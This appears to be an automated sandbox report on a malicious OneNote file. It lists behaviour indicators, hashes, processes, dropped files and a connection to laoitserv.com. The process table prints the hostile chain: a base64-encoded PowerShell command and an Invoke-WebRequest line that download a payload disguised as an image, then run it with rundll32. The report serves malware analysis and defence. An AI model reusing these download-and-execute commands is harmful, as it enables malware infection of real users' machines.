| File name: | Notes.one |
| Full analysis: | https://app.any.run/tasks/7e75e3fb-7932-45e8-9b16-0aa4131ffb28 |
| Verdict: | Malicious activity |
| Analysis date: | February 07, 2023, 16:22:28 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | data |
| MD5: | 0F88D85724A02BF44D091EDAA948D14B |
| SHA1: | 3A37E7EA8F76D54B6C284E3C26005700F1F115F9 |
| SHA256: | 236D168D94FC47C011C664BB0EFB81E8A467E8B928F591B68F0B507F4C345CCB |
| SSDEEP: | 1536:OevY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo71m2x0R6ZA:NgS2EJbyYeMYkKkyX3DWvLLATiJYRgev |
MALICIOUS
Writes to the Start menu file
- ONENOTE.EXE (PID: 3288)
Unusual execution from MS Office
- ONENOTE.EXE (PID: 3288)
Starts CMD.EXE for commands execution
- ONENOTE.EXE (PID: 3288)
SUSPICIOUS
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 320)
- cmd.exe (PID: 3312)
Executing commands from ".cmd" file
- ONENOTE.EXE (PID: 3288)
- cmd.exe (PID: 320)
Application launched itself
- cmd.exe (PID: 320)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 320)
Unusual connection from system programs
- powershell.exe (PID: 3476)
Uses RUNDLL32.EXE to load library
- cmd.exe (PID: 3312)
INFO
Checks supported languages
- ONENOTEM.EXE (PID: 1016)
Creates files in the program directory
- cmd.exe (PID: 320)
The process checks LSA protection
- powershell.exe (PID: 4008)
- powershell.exe (PID: 3476)
- explorer.exe (PID: 1604)
Reads security settings of Internet Explorer
- powershell.exe (PID: 4008)
- powershell.exe (PID: 3476)
Create files in a temporary directory
- powershell.exe (PID: 4008)
- powershell.exe (PID: 3476)
Manual execution by a user
- explorer.exe (PID: 1604)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .one | | | Microsoft OneNote note (100) |
|---|
Total processes
49
Monitored processes
8
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 320 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\OneNote\14.0\NT\0\Open.cmd" " | C:\Windows\system32\cmd.exe | — | ONENOTE.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1016 | /tsr | C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE | — | ONENOTE.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft OneNote Quick Launcher Exit code: 0 Version: 14.0.6015.1000 Modules
| |||||||||||||||
| 1604 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | Explorer.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2392 | rundll32 C:\programdata\big.jpg,DllRegisterServer | C:\Windows\system32\rundll32.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3288 | "C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\admin\AppData\Local\Temp\Notes.one" | C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft OneNote Exit code: 0 Version: 14.0.6022.1000 Modules
| |||||||||||||||
| 3312 | C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd ndl | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3476 | powershell Invoke-WebRequest -URI https://laoitserv.com/Vos/00.gif -OutFile C:\programdata\big.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 4008 | powershell.exe [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCg0KcG93ZXJzaGVsbCBJbnZva2UtV2ViUmVxdWVzdCAtVVJJIGh0dHBzOi8vbGFvaXRzZXJ2LmNvbS9Wb3MvMDAuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXGJpZy5qcGcNCmNhbGwgcnUlMWwzMiBDOlxwcm9ncmFtZGF0YVxiaWcuanBnLERsbFJlZ2lzdGVyU2VydmVyDQoNCmV4aXQNCg==')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
Total events
6 590
Read events
6 484
Write events
98
Delete events
8
Modification events
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: Off | |||
| (PID) Process: | (3288) ONENOTE.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1055 |
Value: Off | |||
Executable files
0
Suspicious files
8
Text files
28
Unknown types
26
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\CVR1296.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\EC45A909-ED1A-48A8-8160-24B7DF82E85E.onetmp | one | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\{17D3192B-928C-4285-B9E9-90D009659E9C} | text | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\Notes (Corrupted Backup).one | one | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\Notes.one~RF10c436a.TMP | one | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\Notes.one | one | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\{3DCBAEAB-BAF8-45C3-BF01-107945296418} | text | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\{D6636F39-DD1B-4A58-9FB6-3A0D07D0E628} | one | |
MD5:— | SHA256:— | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk | lnk | |
MD5:FEE5F1CEE0B255CE6B72B9164DD2C59F | SHA256:1942D9AA432D9CB736949F63FAFA2407E606076497EB185B0E431526938647BE | |||
| 3288 | ONENOTE.EXE | C:\Users\admin\AppData\Local\Temp\{A07BBFDC-1CFC-4221-A89A-B9C8B60D1F5C} | image | |
MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E | SHA256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3476 | powershell.exe | 139.99.8.7:443 | laoitserv.com | OVH SAS | SG | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
laoitserv.com |
| unknown |